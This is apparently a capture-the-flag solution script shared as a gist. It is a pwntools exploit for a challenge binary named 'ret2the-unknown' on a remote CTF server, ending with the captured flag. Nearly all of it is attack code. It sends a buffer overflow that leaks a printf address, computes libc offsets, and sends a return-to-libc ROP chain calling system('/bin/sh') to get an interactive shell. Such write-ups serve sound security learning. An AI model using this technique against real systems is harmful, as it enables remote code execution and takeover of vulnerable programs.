gistfile1.txt

#!/usr/bin/env python3

from pwn import *
from pwnlib.util.packing import p64

context.log_level = logging.DEBUG

target = remote('mc.ax', 31568)
# target = process("./ret2the-unknown")

pMainPLT   = 0x401186  # main() PLT addr

# libc base addr leak
payload = b"A"*(32+8)
payload += p64(pMainPLT)  # Re-exec main

target.sendline(payload)

data = target.recvuntil("good luck!")
data = data.split(b"\n")
data = [l for l in data if b"get there:" in l]
leaked_addr = int(b"0x" + data[0].split()[-1],16)
print(f"[+] Leaked: {hex(leaked_addr)}")

pPrintf = leaked_addr

# Local
# pPopRDI    = 0x4012a3  # pop rdi; ret;
# pBinSh   = pPrintf + 0x133462  # 0x7ffff7f78152 "/bin/sh"
# pSystem  = pPrintf - 0xdea0  # 0x7ffff7e36e50 system()
# pExit    = (pPrintf - 0x56cf0) + 0x3e660

# Remote
pLibcBase = pPrintf - 0x58560
pPopRDI = 0x4012a3
pBinSh = pLibcBase + 0x181519
pSystem = pLibcBase + 0x449c0
pExit = pLibcBase + 0x39ea0

payload = b"A"*(32+8)
payload += p64(pPopRDI)
payload += p64(pBinSh)
payload += p64(pSystem)
payload += p64(pExit)

target.sendline(payload)
target.interactive()

# flag{rob-is-proud-of-me-for-exploring-the-unknown-but-i-still-cant-afford-housing}